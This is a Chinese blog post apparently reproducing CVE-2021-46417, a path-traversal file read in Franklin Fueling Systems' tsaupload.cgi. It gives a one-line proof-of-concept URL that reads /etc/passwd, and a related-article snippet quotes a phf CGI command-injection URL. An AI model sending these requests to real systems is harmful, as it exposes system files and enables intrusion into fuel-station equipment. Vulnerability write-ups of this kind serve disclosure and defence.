Franklin Fueling Systems tsaupload.cgi 任意文件读取漏洞 CVE-2021-46417

最新推荐文章于 2024-10-04 21:13:01 发布
最新推荐文章于 2024-10-04 21:13:01 发布
阅读量289 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46801402/article/details/127861945
版权

漏洞描述:

Franklin Fueling Systems tsaupload.cgi 存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器敏感文件

漏洞利用条件:

/

漏洞影响范围:

Franklin Fueling Systems

漏洞复现:

1.POC:/cgi-bin/tsaupload.cgi?file_name=../../../../../../etc/passwd&password=

修复建议:

  关注厂商修复漏洞。

想要暴富的小林子
关注
专栏目录
漏洞复现 || Franklin Fueling Systems tsaupload.cgi 任意文件读取
失心少年
08-24 156
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。Franklin Electric Franklin Fueling Systems是美国Franklin Electric公司的一个加油系统,Franklin Fueling Systems tsaupload.cgi 存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器敏感文件。1.利用如下POC进行访问。
JDK下sun.net.www.protocol.http.HttpURLConnection类-----Http客户端实现类的实现分析
weixin_33801856的博客
11-23 1796
HttpClient类是进行TCP连接的实现类, package sun.net.www.http; import java.io.*; import java.net.*; import java.util.*; import sun.net.NetworkClient; import sun.net.ProgressSource; import sun.net.Progr...
CGI安全漏洞资料速查 v1.0(三)
03-04
CGI安全漏洞的存在对Web服务器形成了许多潜在的威胁,基于CGI的工作原理,从漏洞成因的角度对CGI安全漏洞进行了分类,发现CGI漏洞的有效方法是通过安全漏洞检测。本文总结了CGI安全漏洞的资料,供读者查阅。
C语言CGI实现文件上传
newflexi
12-17 1484
在很多网站中经常会遇到有向服务器上传文件的情况,比如在博客或空间中上传自己的头像。这一节我们来看一下在后台如何使用C语言实现文件上传这一功能。 首先创建一个html文档来上传文件,然后使用wireshark抓取数据包来分析一下上传文件文件内容如何解析。html文档如下: [html] view plain copy 在CODE上查看代码片派生到我的代码片 “http://www.w3.org/
Cgi-bin 30个漏洞+使用方法.txt
07-18
Cgi-bin 30个漏洞+使用方法
CGI 安全漏洞资料速查
li1213的专栏
06-06 1933
CGI 安全漏洞资料速查类型:攻击型 名字:phf 风险等级:中 描述:在 NCSA 或者 Apache(1.1.1版本以内)非商业版本的 WebServer 中    有一段程序 util.c,允许黑客以 root 身份执行任何一个指令:       http://www.xxx.com/cgi-bin/phf?Qname=root%0Asome%20command%20here 建议:无
9.CVE-2016-5195(脏牛)内核提权漏洞分析
weixin_30455365的博客
08-26 755
漏洞描述: 漏洞编号:CVE-2016-5195 漏洞名称:脏牛(Dirty COW) 漏洞危害:低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权 影响范围:Linux内核>=2.6.22(2007年发行)开始就受影响了,直到2016年10月18日才修复。 360 Vulpecker Team:Android 7.0最新的10月补丁...
【传送点】上千漏洞复现复现集合 exp poc 持续更新
失心少年
11-28 4232
漏洞复现】OpenTSDB 2.4.0 命令注入(CVE-2020-35476)漏洞复现【漏洞复现】熊海cms 存在sql注入 附poc【漏洞复现】Array VPN任意文件读取漏洞漏洞复现】好视通视频会议系统(fastmeeting) toDownload.do接口存在任意文件读取漏洞 附POC【漏洞复现】金蝶云星空管理中心 ScpSupRegHandler接口存在任意文件上传漏洞 附POC【漏洞复现】DPTech VPN存在任意文件读取漏洞
juliacn.github.io:cn.julialang.org的源代码-git source code
03-25
自述文件 这里是的源码,提供对Julia英文官方网站( )的中文翻译版。 如何贡献翻译? Fork本repo,然后直接在github上编辑,发请求(注意发PR的时候要合并到dev分支,而不是master分支)。 下载最新版本的Julia,...
pairs.one:https的源代码-one source code
03-24
一对 这是的源代码-简洁的多人在线记忆/集中游戏。 要启动该应用程序: 使用mix deps.get安装依赖mix deps.get 使用npm install安装Node.js依赖项 使用npm install -g elm安装Elm或按照说明进行操作 ...
动态系统的反馈控制,第 4 版,GF Franklin,JD Powell,A. Emami-Naeini:用于动态系统反馈控制的 .m 和 .mdl 文件-matlab开发
06-01
《动态系统的反馈控制》第四版是由 GF Franklin、JD Powell 和 A. Emami-Naeini 共同编著的一本经典教材,主要探讨了如何利用控制理论来设计和分析动态系统的反馈控制系统。书中包含了大量的数学模型和实例,为读者...
franklin-le.github.io
03-07
标题 "franklin-le.github.io" 暗示这是一个个人或组织在 GitHub 上的网页项目。GitHub 是一个托管代码和协作开发的平台,通常用于开源项目。用户可以通过创建 GitHub Pages 来建立自己的个人网站或者项目展示页面。...
.888勒索病毒解密方法|勒索病毒解决|勒索病毒恢复|数据库修复
数据恢复研究℃
10-01 798
引言在数字化时代,网络空间的威胁日益增多,其中勒索病毒已成为数据安全领域的一大挑战。近期,.888勒索病毒作为一种新型的恶意软件,正逐渐引起人们的广泛关注。本文将详细介绍.888勒索病毒的特点、如何恢复被其加密的数据文件,以及预防该病毒的有效策略。.888勒索病毒不断更新和变异的特点,是其能够持续威胁网络安全的重要因素。
从密码学看盲拍合约:智能合约的隐私与安全新革命!
Huahua_1223的博客
09-28 1209
随着区块链技术的发展,智能合约在各种场景中的应用越来越广泛。盲拍合约作为一种新兴的智能合约形式,利用密码学原理为参与者提供了隐私保护和安全保障。这种合约不仅增强了竞拍的公平性,还消除了时间压力,让参与者能够在更为放松的环境中进行投标。本文将深入探讨盲拍合约的定义、优势、工作原理以及代码实现,旨在为读者提供一个全面的理解。盲拍合约是一种智能合约,允许参与者在不公开其出价的情况下进行竞拍。参与者提交一个“盲出价”,其中包含出价金额、一个虚假的标记以及一个秘密值。
什么是托管安全信息和事件管理 SIEM?
网络研究观
09-28 1877
SIEM 解决方案是组织网络安全基础设施的重要组成部分
【隐私计算篇】多方安全计算之函数秘密共享(FSS)
最新发布
源泉的小广场
10-04 666
fss、函数秘密共享、函数秘密分享、分布式点函数、DPF、Distributed Point Function、多方安全计算、安全多方计算、MPC、多服务器PIR、SilentOT、PCG for tensor product from LPN and FSS
安全服务面试
m0_74402888的博客
09-28 790
内网的计算机可向 Internet 上的其他计算机发送连接请求,但 Internet 上其他。个列表中的 IP 进行 SYN+ACK 的重试。明白这种攻击的基本原理,还是要从 TCP 连接建立的过程开始说起:大家都知道,TCP 与。的 IP 地址,如果攻击者以数万/秒的速度发送 SYN 报文,同时利用 SOCK_RAW。Internet 上的计算机,但 Internet 上的计算机无法访问局域网内的计算机。内网的计算机以 NAT(网络地址转换)协议,通过一个公共的网关访问 Internet。
等保测评:企业数字安全的坚实盾牌
w13359990065的博客
09-30 1769
据权威机构统计,未通过等保测评的企业在遭遇网络安全事件时,其数据泄露风险高出已通过企业近30%,这不仅直接威胁到企业的核心资产安全,还可能导致品牌信誉的严重受损。以某知名电商企业为例,因忽视等保测评,其支付系统曾遭受黑客攻击,导致大量用户信息泄露,最终不仅面临巨额罚款,还失去了大量客户的信任,市场份额一落千丈。以某知名电商企业为例,其在一次等保测评中发现,其支付系统存在一处严重的SQL注入漏洞,该漏洞允许攻击者通过构造特定的输入参数,绕过系统验证,直接访问数据库,进而获取敏感信息。
Franklin C-51编译器数据类型详解
"本文档详细介绍了Franklin C-51编译器支持的数据类型及其物理结构,涵盖了位、字符、整型、长整型、浮点型、指针、特殊功能寄存器以及相关的编程概念,如数据转换、存储器类型和中断服务程序等。" 在Franklin C-51...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值